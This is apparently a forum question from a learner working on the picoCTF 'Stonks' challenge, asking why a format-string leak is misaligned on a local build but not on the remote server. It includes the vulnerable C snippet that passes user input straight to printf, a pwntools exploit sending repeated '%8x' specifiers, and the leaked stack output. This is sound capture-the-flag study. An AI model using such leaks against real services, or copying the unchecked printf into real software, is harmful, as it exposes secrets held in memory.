# String format exploit works differentely on my machine than on remote target

Tags: c, format-string

I'm learning binary exploitation with the picoCTF challenges. I solved [Stonks](https://play.picoctf.org/practice/challenge/105?category=6&page=1), but I'm trying to learn more about how the stack works.

What I did was the following:

- checked out the source, here is the vulnerable snippet

```
int buy_stonks(Portfolio *p) {
  char api_buf[FLAG_BUFFER];
  FILE *f = fopen("api", "r");
  fgets(api_buf, FLAG_BUFFER, f);
  // TODO: Figure out how to read token from file, for now just ask
  char *user_buf = malloc(300 + 1);
  scanf("%300s", user_buf);
  printf(user_buf);
}
```

- created the `api` file `echo picoCTF{s@mpl3_k3y} > api`
- created exploit

```
#!/usr/bin/env python3
from pwn import *
os.system("make vuln")
io = process("./vuln")
# io = remote("mercury.picoctf.net", 59616)

payload = b"".join([b"" + "%8x".encode() * 14])
print(payload.decode("utf-8"))
io.sendline(payload)

out = io.recvline().decode()
for i in range(0, len(out[:-1]), 8):
    h = out[i:i+8]
    print(f"{h}: {p32(int(h, 16))}")
```

If I run it on my machine the output is:

```
%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x
       1: b'\x01\x00\x00\x00'
       1: b'\x01\x00\x00\x00'
f7d14887: b'\x87H\xd1\xf7'
      19: b'\x19\x00\x00\x00'
5555b540: b'@\xb5UU'
ffffd790: b'\x90\xd7\xff\xff'
555592a0: b'\xa0\x92UU'
       0: b'\x00\x00\x00\x00'
5555a2d0: b'\xd0\xa2UU'
5555b520: b' \xb5UU'
5555b540: b'@\xb5UU'
6f636970: b'pico'
706d4073: b's@mp'
 a7d7933: b'3y}\n'
```

Last 3 line output the partial flag `pico....s@mp....3y}\n`

The same exploit (just commented out `io = remote("mercury.picoctf.net", 59616)` prints the flag from the target:

```
...
6f636970: b'pico'
7b465443: b'CTF{'
...
ffcf007d: b'}\x00\xcf\xff'
```

I tried searching for maybe a linux security flag that could be enabled on my machine but I'm still new, but eager to learn!

#### The question is *why does it skip a byte on my local setup?*